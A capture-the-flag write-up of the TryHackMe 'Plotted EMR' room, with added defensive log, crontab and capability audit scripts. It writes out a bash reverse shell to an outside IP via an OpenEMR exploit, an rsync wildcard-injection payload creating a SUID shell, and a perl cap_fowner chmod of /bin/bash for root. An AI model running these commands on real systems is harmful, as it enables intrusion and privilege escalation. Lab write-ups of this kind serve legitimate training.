“The only true wisdom is in knowing you know nothing.” - Socrates

Plotted EMR – Hard

This writeup will cover the Plotted EMR room on TryHackMe.

Summary

  • Nmap shows that the following ports are open:
    • 21/ftp
    • 22/ssh
    • 80/http
    • 5900/mysql
    • 8890/http
  • Anonymous login allowed FTP
  • FTP – /.-/.../you_are_determined.txt (Contains hint that username is admin)
  • Upon enumerating port 5900 (mysql), we find that we can authenticate as the user admin without any password. However, there isn’t any interesting information.
    • mysql -u admin -h {ip} -P 5900
  • GoBuster finds some random files on port 80, However, there is a /portal directory on port 8890.
  • OpenEMR running on port 8890
  • Public Exploit requires authentication
  • Upon research, we find that setup.php and admin.php are available to unauthenticated users.
  • OpenEMR instance allows multiple sites to be created.
  • Initial foothold by adding a new site and using the public exploit against it.
  • OpenEMR – 5.0.1.3
  • Flag 1 – /var/www/ThisFileIsInteresting
  • rsync cron job with wildcard running as plot_admin
  • Leverage wildcard injection to escalate privileges to plot_admin
  • We find that /usr/bin/perl has cap_fowner capability.
    • We’ll leverage this to escalate our privileges to root.
  • All Done 😀

Enumeration

  • Nmap and rustscan show that the following ports are open:
    • 21/ftp
    • 22/ssh
    • 80/http
    • 5900/mysql
    • 8890/http
  • Nmap also reveals that anonymous logons are allowed for FTP.
  • By enumerating the ftp service, we find that there is a file called you_are_determined.txt
  • Following are the contents of the file mentioned above:

        Sorry, but you wasted your time!

        Here is something for you :D
        https://www.youtube.com/watch?v=dQw4w9WgXcQ

        Wait..I'll give you a hint: see if you can access the `admin` account

  • The hint above suggested that there might be a user called admin. We make a note of this and continue enumerating.
  • Upon enumerating port 5900 (mysql), we find that we can authenticate as the user admin without any password. However, there isn’t any interesting information.
    • mysql -u admin -h {ip} -P 5900
  • Running GoBuster on both ports 80 and 8890 finds multiple files containing Base64-encoded text.
  • However, on port 8890, we find that there is a directory called portal.
  • Upon browsing to the directory, we are presented with the OpenEMR login page.
  • Since we have a hint that the user might be admin, we try some common passwords, with no luck.
  • Brute-forcing with hydra using the rockyou wordlist doesn’t take us anywhere.
  • Upon researching on Google, we find a vulnerability report for OpenEMR by ‘Project Insecurity’.
  • We find that there are multiple ways in which we can exploit this. However, authentication is required.
  • In the same report, we also find that the application is affected by unauthenticated information disclosure (the setup.php and admin.php files).
  • Upon browsing to admin.php, we find that we can add a new site.
  • Therefore, we can leverage this to get admin access to the application and then use the public exploit to gain RCE.
  • Process:
    • Browse to http://{ip}:8890/portal/admin.php
    • Add a new site, with the option I have already created the database
    • Either use the mysql running on port 5900 or host a dummy mysql server on attack machine
      • CREATE DATABASE openemr;
      • CREATE USER 'openemr_user'@'%' IDENTIFIED BY 'Password12';
      • GRANT ALL PRIVILEGES ON openemr.* TO 'openemr_user'@'%';
      • FLUSH PRIVILEGES;
    • Enter the appropriate details in the config screen
    • Wait for the process to finish
  • Note: this process takes some time (~2 mins if using the AttackBox); you can monitor DB progress using:
    • SELECT table_schema AS `Database`, table_name AS `Table`, round(((data_length + index_length) / 1024 / 1024), 2) `Size in MB` FROM information_schema.TABLES ORDER BY (data_length + index_length) DESC LIMIT 0,10;
  • Additionally, this doesn’t work properly when proxied via Burp.
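As an added defensive check (not part of the original writeup and not OpenEMR code), the following script scans constructed Apache-style access log lines for successful requests to the installer endpoints described above (/portal/admin.php and /portal/setup.php) and extracts any non-default ?site= values, which is the trace a site-creation attempt leaves behind. The log lines, IPs and timestamps are assumptions; only the /portal path mirrors the writeup.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined"-style sample; everything except the /portal
# path is made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:10:00:01 +0000] "GET /portal/interface/login/login.php?site=default HTTP/1.1" 200 5120
10.0.0.9 - - [10/Oct/2023:10:00:07 +0000] "GET /portal/admin.php HTTP/1.1" 200 2048
10.0.0.9 - - [10/Oct/2023:10:00:20 +0000] "GET /portal/setup.php?site=evil HTTP/1.1" 200 4096
10.0.0.9 - - [10/Oct/2023:10:01:02 +0000] "POST /portal/setup.php?site=evil HTTP/1.1" 200 8192
10.0.0.5 - - [10/Oct/2023:10:02:00 +0000] "GET /portal/setup.php HTTP/1.1" 403 199
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Installer / site-admin endpoints that should never answer 200 to the public
# once an OpenEMR instance is deployed.
INSTALLER_PATHS = {"/portal/admin.php", "/portal/setup.php"}


def parse_line(line):
    """Return ip, method, path, site and status for one log line (None if unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    site = parse_qs(parts.query).get("site", ["default"])[0]
    return {"ip": m.group("ip"), "method": m.group("method"),
            "path": parts.path, "site": site, "status": int(m.group("status"))}


def installer_exposure(log_text):
    """Summarise reachable installer hits and any non-default site names requested."""
    hits, sites, sources = [], set(), set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["path"] not in INSTALLER_PATHS:
            continue
        if rec["status"] == 200:          # blocked (403/404) responses are the healthy case
            hits.append((rec["ip"], rec["method"], rec["path"]))
            sources.add(rec["ip"])
        if rec["site"] != "default":      # a new site is being set up
            sites.add(rec["site"])
    return {"reachable_hits": hits, "new_sites": sorted(sites), "sources": sorted(sources)}


if __name__ == "__main__":
    for key, value in installer_exposure(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Any non-empty reachable_hits means the installer pages still answer to the network and should be removed or access-restricted at the web server after installation.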

Exploitation

  • There are multiple exploits available for the specified version; in this writeup we cover 45161.
    • Note: The machine has been configured to disallow some of the exploits.
  • We need to modify the exploit to authenticate using our newly created site:
    • On line 66, change ?site=default to ?site={nameofnewsite}
  • Exploit Commands:

        python2 45161.py -u {username} -p {password} -c '/bin/bash -i >& /dev/tcp/10.9.4.47/1234 0>&1' http://{ip}:8890/portal

        nc -nvlp 1234

  • We got a shell as www-data.
  • Looking inside /var/www, we find a file called ThisFileIsInteresting.
  • This file contains our 1st flag.

Privilege Escalation - 1

  • Looking at the contents of crontab, we find that there is an rsync job running as plot_admin every minute, and the command contains a wildcard.
  • We can leverage this to perform wildcard injection and escalate privileges to plot_admin
  • Process:
    • cd /var/www/html/portal/config
    • echo "cp /bin/bash /home/plot_admin/pa_shell; chmod +xs /home/plot_admin/pa_shell" > shell.sh
    • chmod +x shell.sh
    • touch -- "-e sh shell.sh"
    • /home/plot_admin/pa_shell -p
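As an added audit script (not from the original writeup or the room), the following checks for the two conditions that make the cron job above exploitable: a system crontab entry that hands an unquoted glob to rsync (or a similar tool) while running as another user, and file names beginning with "-" in the globbed directory, which is what an injection attempt leaves on disk. The crontab text is a constructed sample; the schedule, user and backup path are assumptions.

```python
import os
import re
import tempfile

# Constructed system crontab in the shape the writeup describes; the exact
# schedule, user field and paths are assumptions, not the room's real crontab.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
* * * * * plot_admin cd /var/www/html/portal/config && rsync -a * /home/plot_admin/backup/
0 3 * * * root rsync -a /etc/ /root/etc-backup/
"""

# Tools whose option parsing turns a crafted file name into an option when
# the shell expands a bare glob. Fix: name the directory explicitly, or pass
# "--" before the glob so later arguments are never treated as options.
WILDCARD_PRONE = ("rsync", "tar", "chown", "chmod")
CRON_RE = re.compile(r'^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$')


def find_wildcard_jobs(crontab_text):
    """Return (user, working_dir, command) for jobs passing an unquoted * to a prone tool."""
    findings = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m or not any(t in m.group("cmd") for t in WILDCARD_PRONE):
            continue
        if not re.search(r'(^|\s)\S*\*(\s|$)', m.group("cmd")):
            continue  # no bare glob argument, so nothing to inject into
        cwd = re.search(r'cd\s+(\S+)', m.group("cmd"))
        findings.append((m.group("user"), cwd.group(1) if cwd else None, m.group("cmd")))
    return findings


def option_like_names(directory):
    """File names starting with '-' in a globbed directory are an injection indicator."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def demo():
    """Run both checks: the sample crontab, and a throwaway directory with a crafted name."""
    jobs = find_wildcard_jobs(SAMPLE_CRONTAB)
    with tempfile.TemporaryDirectory() as d:
        for name in ("config.php", "-e sh shell.sh", "shell.sh"):
            open(os.path.join(d, name), "w").close()
        flagged = option_like_names(d)
    return jobs, flagged


if __name__ == "__main__":
    print(demo())
```

On a real host, run option_like_names against the working directory of every job find_wildcard_jobs reports, and check that that directory is not writable by a less privileged account than the job's user.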

Privilege Escalation - 2

  • Looking for ways to escalate privileges from plot_admin, we find the following:
    • sudo -l (Password Required)
    • find / -type f -perm -u=s 2>/dev/null (Nothing Suspicious)
    • Searching for possible passwords for the user plot_admin, no luck.
    • getcap -r / 2>/dev/null (/usr/bin/perl has cap_fowner capability)
  • Since we have cap_fowner capability for /usr/bin/perl, we can leverage this to escalate privileges to root.
  • The following commands can be used to gain root privileges:
    • /usr/bin/perl -e 'chmod 04777, "/bin/bash";'
    • /bin/bash -p
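As an added hardening check (not part of the original writeup), the following script parses constructed `getcap -r /` output in both the older "path = caps+ep" and newer "path caps=ep" libcap formats and flags binaries carrying capabilities that are root-equivalent on a general-purpose program, such as the cap_fowner on /usr/bin/perl found above. Only the perl line mirrors the writeup; the other entries are assumptions.

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null` output mixing both libcap
# output styles; only the /usr/bin/perl line mirrors the writeup.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl = cap_fowner+ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/python3.8 cap_setuid=ep
"""

# Capabilities that let a process change file ownership/permissions, bypass
# DAC checks, or change identity: on an interpreter they are a path to root.
DANGEROUS = {"cap_fowner", "cap_chown", "cap_dac_override", "cap_dac_read_search",
             "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
             "cap_sys_module", "cap_setfcap"}
LINE_RE = re.compile(r'^(?P<path>\S+)\s*=?\s*(?P<caps>\S+)$')


def parse_getcap(text):
    """Yield (path, set_of_caps) from getcap output, dropping the +ep/=ep flag suffix."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        caps = re.split(r'[+=]', m.group("caps"))[0]
        yield m.group("path"), {c.strip() for c in caps.split(",") if c.strip()}


def dangerous_capabilities(text):
    """Return {path: sorted dangerous caps} for binaries that should not carry them."""
    findings = {}
    for path, caps in parse_getcap(text):
        bad = sorted(caps & DANGEROUS)
        if bad:
            findings[path] = bad
    return findings


if __name__ == "__main__":
    # Remediation is `setcap -r PATH` (or reinstalling the package) rather
    # than leaving an interpreter with a root-equivalent file capability.
    for path, caps in dangerous_capabilities(SAMPLE_GETCAP).items():
        print(f"{path}: {', '.join(caps)}")
```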
  • All Done! 😀

Hope you enjoyed reading this writeup.
Happy Hunting! 😀

Posted by: infinity
